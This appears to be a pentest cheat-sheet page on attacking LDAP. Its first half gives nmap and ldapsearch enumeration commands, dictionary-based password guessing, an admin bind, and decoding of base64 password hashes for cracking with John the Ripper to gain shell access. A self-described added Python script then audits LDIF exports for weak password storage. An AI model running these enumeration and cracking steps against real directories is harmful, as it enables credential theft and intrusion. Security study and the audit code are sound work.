LDAP
LDAP can be enumerated in a way to gain credentials.
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
ldapsearch -x -b "dc=acme,dc=com" "*" -h 148.32.42.5 | awk '/dn: / {print $2}'
ldapsearch -x -D "cn=admin,dc=acme,dc=com" -s sub "cn=*" -h 148.32.42.5 | awk '/uid: /{print $2}' | nl
ldapwhoami -h ldap.acme.com -w "abcd123"
Use the ldap-users.pl script, based on a cewl scan or on my userslist.sh script (see my GitHub).
A website is a good way to get inspired.
Once we have a valid list of users, we can move forward to search for valid user and password combinations.
Use ldap-pass.pl, based on the word list of your choice.
Use ldapwhoami-dictonary.sh
ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
The password hashes are encoded in base64; we can easily decode the string to extract the hash.
echo "e01ENX0wTHVBcXJ1R0diYmpVUlB3TG5KMUt3PT0=" | base64 -d
All these hashes can be loaded up in JTR and cracked to get shell access on the remote system.
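For the defensive side of this step, the following added example (not part of the original page or of the scripts it mentions) audits an LDIF export: it decodes each userPassword value, as the base64 command above does, and reports the storage scheme and salt length. The function names and the sample entries, apart from the page's own value, are constructed for illustration.

```python
import base64
import re

# Digest size in bytes per scheme; any bytes after the digest are the salt.
DIGEST_LEN = {"MD5": 16, "SMD5": 16, "SHA": 20, "SSHA": 20}

def classify(value, is_b64=True):
    """Return (scheme, salt_len, finding) for one userPassword value."""
    text = base64.b64decode(value).decode("latin-1") if is_b64 else value
    m = re.fullmatch(r"\{([A-Za-z0-9_-]+)\}(.*)", text, re.S)
    if m is None:
        return ("CLEARTEXT", 0, "stored without hashing")
    scheme, body = m.group(1).upper(), m.group(2)
    if scheme not in DIGEST_LEN:
        return (scheme, None, "scheme not assessed here")
    salt_len = len(base64.b64decode(body)) - DIGEST_LEN[scheme]
    if salt_len <= 0:
        return (scheme, 0, "unsalted fast hash")
    return (scheme, salt_len, "salted, but still a fast hash")

def audit(ldif):
    """Return [(dn, scheme, salt_len, finding)] for each userPassword in an LDIF dump."""
    rows, dn = [], None
    for line in re.sub(r"\r?\n ", "", ldif).splitlines():  # unfold continuation lines
        if line.startswith("dn: "):
            dn = line[4:]
        m = re.match(r"(?i)userPassword(::?) (.*)", line)
        if m:  # "::" marks a base64 value, ":" a literal one
            rows.append((dn,) + classify(m.group(2), m.group(1) == "::"))
    return rows

def _stored(scheme, blob):
    """Build a constructed value in the form ldapsearch prints it."""
    inner = "{%s}%s" % (scheme, base64.b64encode(blob).decode())
    return base64.b64encode(inner.encode()).decode()

_bob = _stored("SSHA", bytes(20) + b"salt")  # constructed digest and salt
SAMPLE_LDIF = "\n".join([                    # constructed entries
    "dn: uid=alice,ou=people,dc=acme,dc=com",
    "userPassword:: e01ENX0wTHVBcXJ1R0diYmpVUlB3TG5KMUt3PT0=",  # value from the page
    "",
    "dn: uid=bob,ou=people,dc=acme,dc=com",
    "userPassword:: " + _bob[:20] + "\n " + _bob[20:],  # folded line
    "",
    "dn: uid=carol,ou=people,dc=acme,dc=com",
    "userPassword: example-literal-value",
])
if __name__ == "__main__":
    print(*audit(SAMPLE_LDIF), sep="\n")
```

Entries reported as cleartext or unsalted are the ones to rehash first, and read access to the userPassword attribute should be restricted by ACL.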
This article can help :